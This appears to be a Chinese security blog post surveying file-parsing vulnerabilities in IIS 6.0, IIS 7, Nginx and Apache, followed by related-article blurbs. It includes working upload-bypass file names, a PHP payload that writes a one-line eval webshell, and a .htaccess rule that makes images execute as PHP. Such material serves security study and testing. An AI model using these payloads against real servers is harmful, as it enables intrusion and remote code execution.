解析漏洞总结

最新推荐文章于 2023-08-10 14:15:26 发布
最新推荐文章于 2023-08-10 14:15:26 发布
阅读量1.2k 收藏
点赞数
分类专栏: Other Security 文章标签: iis 6.0 漏洞

一、IIS 5.x/6.0解析漏洞

IIS 6.0解析利用方法有两种

1.目录解析

/xx.asp/xx.jpg

2.文件解析

wooyun.asp;.jpg

第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

例如创建目录 wooyun.asp,那么

/wooyun.asp/1.jpg

将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。

第二种,在IIS6.0下,分号后面的不被解析,也就是说

wooyun.asp;.jpg

会被服务器看成是wooyun.asp

还有IIS6.0 默认的可执行文件除了asp还包含这三种

/wooyun.asa
/wooyun.cer
/wooyun.cdx

乌云上的IIS 6.0解析漏洞利用案例

http://www.wooyun.org/searchbug.php?q=IIS6.0

二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…

在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

的文件,然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php

这个漏洞案例

WooYun: 用友软件某分站SQL注入漏洞+nginx解析漏洞

WooYun: 新浪网分站多处安全漏洞(nginx解析+SQL注射等)小礼包

WooYun: kingsoft.com某x级域名nginx解析漏洞+爆路径

三、Nginx <8.03 空字节代码执行漏洞

影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg%00.php

来执行其中的代码

Nginx 空字节代执行漏洞案例

http://www.wooyun.org/searchbug.php?q=%2500.php

四、Apache解析漏洞

Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

Apache解析漏洞案例

http://www.wooyun.org/searchbug.php?q=apache%E8%A7%A3%E6%9E%90

五、其他

在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。

如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入: 

<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>

然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。

Jif_L
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全】网站中间件存在的解析漏洞
你在看屏幕的同时,屏幕也在注视着你
07-24 1686
常见的中间件解析漏洞
中间件解析漏洞总结
qq_61553520的博客
04-20 183
这一篇和我的另外一篇文文件上传漏洞是互为姊妹篇,在利用思路会相互补充。文件上传漏洞的另外一些特殊情况,上传的文件检测严格,只能常规上传图片,但是如果中间存在一些解析漏洞的话我们就可以利用解析漏洞进行上传后门。
服务器检查检测修复漏洞工具
02-15
服务器安全工具 v0.8 1.目前该工具只作为辅助查找,站长可自行添加正则表达式。 2.服务器后门检测采用白名单特征检查方式,可检查出所有替换型后门变种。 3.网站后门辅查支持自定义白名单,可以在网站初建时或本地原始备份进行白名单制作,可减少扫描结果便于判断。 4.服务器综合管理,支持远程终端端口修改及开启,可卸载及管理危险组件。 5.开关机时间检查,可发现非正常关机事件 6.映像劫持管理,可查看、添加、删除现有映像劫持列表 7.数字签名验证可用于文件校验发现未签名的非系统文件 8.下载地址转换方便用户下载其他下载软件的专用链(支持迅雷/快车/旋风) 9.系统登陆时间检查功能可方便用户检查非工作时间段的非法登陆
Web安全测试中常见逻辑漏洞解析
02-25
这里需要根据业务环境的不同总结出自己的预防方式,最好咨询专门的网络安全公司。这个漏洞主要是发生在前端验证处,并且经常发生的位置在于验证码主要发送途径其运行机制如下图所示:黑客只需要抓取R
Web中间件常见漏洞总结(免积分)
02-09
在本文中,我们将深入探讨Web中间件中常见的安全漏洞,并提供相应的防范策略。 一、跨站脚本(XSS)攻击 XSS攻击是通过在网页中注入恶意脚本来实现的,攻击者可以获取用户敏感信息,如登录凭据。防范XSS攻击的关键...
漏洞扫描的简单总结概述理解
04-10
漏洞扫描的简单总结概述理解 漏洞扫描是当前网络安全中非常重要的一方面,旨在检测和识别系统或应用程序中的安全漏洞,以便采取相应的措施来修复和改进系统安全。下面将对漏洞扫描的相关知识点进行详细的解释和总结...
专题资料(2021-2022年)AndroidNative层文件解析漏洞挖掘指南讲解.doc
07-19
Android Native 层文件解析漏洞挖掘指南 Android Native 层文件解析漏洞挖掘是一种常见的安全漏洞,特别是在 Android 平台上。该漏洞可以导致应用程序崩溃,导致用户数据泄露和恶意攻击。为挖掘这种漏洞,我们需要...
JAVA XML 解析
05-14
此外,使用最新的解析库可以减少已知的安全漏洞。 7. 配置和性能优化: 对于XML解析性能的优化,可以选择合适的解析器类型,如大文件使用SAX或StAX。还可以配置解析器,例如禁用DTD解析以提升速度,或者启用验证以...
IIS中常见的十八个安全漏洞
03-04
IIS 中常见的十八个安全漏洞 IIS4hack 缓冲溢出是一个常见的安全漏洞,它主要存在于.htr、.idc 和.stm 文件中。攻击者可以利用这个漏洞在系统中下载和执行程序。要检测这样的站点,需要两个文件 iishack.exe 和 ncx...
javaWeb安全验证漏洞修复总结.doc
12-19
- **概述**:如果登录请求信息没有加密或加密强度不足,攻击者可能截取并解析这些信息,获取用户凭据。 - **安全风险及原因**:明文传输或弱加密导致用户账号密码暴露,使账户安全受到威胁。 - **APPSCAN扫描建议...
python爬取漏洞库.zip
12-23
在这个项目中,开发者可能使用了这些库来解析漏洞数据库网页,抓取漏洞的名称、编号、描述、影响程度等关键信息。 然后,MySQL数据库用于存储爬取的数据。Python的mysql-connector-python库可以方便地与MySQL进行...
python爬取cnvd漏洞库信息的实例
09-19
总结来说,这个实例展示了如何使用Python进行网页爬虫开发,包括设置请求头、处理cookies、解析HTML以及存储数据到Excel文件。同时,也提醒我们在面对有反爬虫策略的网站时,应灵活运用各种技术和工具,如requests、...
http协议题后知识点总结.docx
10-18
本文将对HTTP协议的一些关键知识点进行深入的总结解析,结合题目描述,我们将涵盖GET和POST传输方式、F12开发者工具的使用、URL参数的修改、robots.txt文件以及PHP备份文件等主题。 首先,F12开发者工具是前端...
php代码审计,php漏洞详解
最新发布
qq_47289634的博客
08-10 1381
HTTP 响应拆分是由于攻击者经过精心设计利用电子邮件或者链接,让目标用户利用一个请求产生两个响应,前一个响应是服务器的响应,而后一个则是攻击者设计的响应。此攻击之所以会发生,是因为 WEB程序将使用者的数据置于 HTTP 响应表头中,这些使用者的数据是有攻击者精心设计的。session 保存的是每个用户的个人数据,一般的 web 应用程序会使用session 来保存通过验证的用户 账号和密码。一旦获取到 session id,那么攻击者可以利用目标用户的身份来登录网站,获取目标用户的操作权限。
apache php解析漏洞,apache解析漏洞及修复方法
weixin_34476159的博客
03-19 130
apache对文件后缀的解析方法是”.”后边的都是后缀,从后到前,如果后缀无效,会解析前一个,例如 1.php.x1.x2.x3 他会先解析x3,不存在解析x2,不存在解析x1,都不存在就只能解析php了。如图:定义后缀,但是不可能所有后缀都定义吧?x1.x2.x3可以换成任意后缀例如1.php.a,.a没有定义,apache不明白a是什么后缀,就向前解析,也就是去解析php。用伪静态能解决这个问...
IIS6.0文件解析漏洞
龙狼刺的博客
05-11 6224
目录 一、相关知识 1、IIS6.0解析漏洞介绍 2、IIS6.0PUT上传原理 3、IIS6.0解析文件类型 4、IIS6.0文件解析漏洞修复方案 二、环境配置 三、文件上传 1、设置代理 2、靶机环境配置 3、截取数据包 4、探测漏洞 5、创建文件,并写入一句话木马 6、复制文件并重命名,绕过拦截 四、蚁剑连接 一、相关知识 1、IIS6.0解析漏洞介绍 (1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。...
PHP漏洞全解
04-15 971
针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injecti...
解析漏洞原理以及相关优缺点
07-15
解析漏洞是指在程序或系统的输入解析过程中存在的安全漏洞,攻击者可以利用这些漏洞来执行恶意操作或绕过安全措施。下面是解析漏洞的原理以及相关的优缺点: 原理: 1. 不正确的输入验证:解析过程中没有对输入进行充分的验证和过滤,导致恶意输入被解析并执行。 2. 缓冲区溢出:输入解析过程中存在不足以容纳输入的缓冲区,导致溢出现象,攻击者可以利用溢出来执行恶意代码。 3. 解析器错误:解析器存在逻辑错误或设计缺陷,攻击者可以利用这些错误来绕过安全机制或执行恶意操作。 4. 注入攻击:攻击者通过在输入中插入特定的命令或代码来执行远程命令或注入恶意代码。 优点: 1. 灵活性:解析漏洞可以利用各种输入格式和协议进行攻击,攻击者可以根据具体情况选择最有效的方式进行攻击。 2. 成功率高:由于解析过程通常涉及复杂的逻辑和数据处理,因此解析漏洞的成功率相对较高。 3. 影响广泛:许多应用程序和系统都使用解析器来处理输入数据,因此解析漏洞可以影响到广泛的目标。 缺点: 1. 难以检测:解析漏洞通常不容易被传统的安全工具和技术所检测,因为攻击者可以利用各种技术来隐藏恶意输入。 2. 难以修复:修复解析漏洞通常涉及到修改底层的解析器代码或重新设计解析逻辑,这可能需要大量的时间和资源。 3. 可能导致严重后果:成功利用解析漏洞可能导致系统崩溃、数据泄露、远程代码执行等严重后果,对系统和用户造成巨大的损失。 总结解析漏洞是一种常见的安全威胁,攻击者可以利用这些漏洞来执行恶意操作。尽管解析漏洞具有一些优点,但其缺点也是不可忽视的。为了有效防御解析漏洞,开发人员应该对输入进行严格验证和过滤,并实施安全的解析器设计和实现。此外,及时修复已知的解析漏洞也是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值